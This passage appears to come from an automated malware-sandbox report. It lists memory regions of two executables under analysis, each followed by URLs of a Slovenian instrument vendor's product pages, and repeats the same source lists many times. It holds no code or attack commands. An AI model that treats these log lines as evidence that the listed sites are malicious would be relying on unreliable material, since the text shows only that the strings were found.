PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/plavajoca-stikala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/potopni-hidrostaticni
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/prikazovalniki-nivoja
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/zvezno-merjenje-nivoj
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-ph-co2-prevodnosti-vakuuma-vsebnosti-soli-kvalitet
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/digitalni-manometri/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/kontaktni-manometri-2/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/merilni-pretvorniki-tlaka/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/montazni-pribor-za-merilnike-tlaka/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/procesni-pretvorniki-tlaka/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 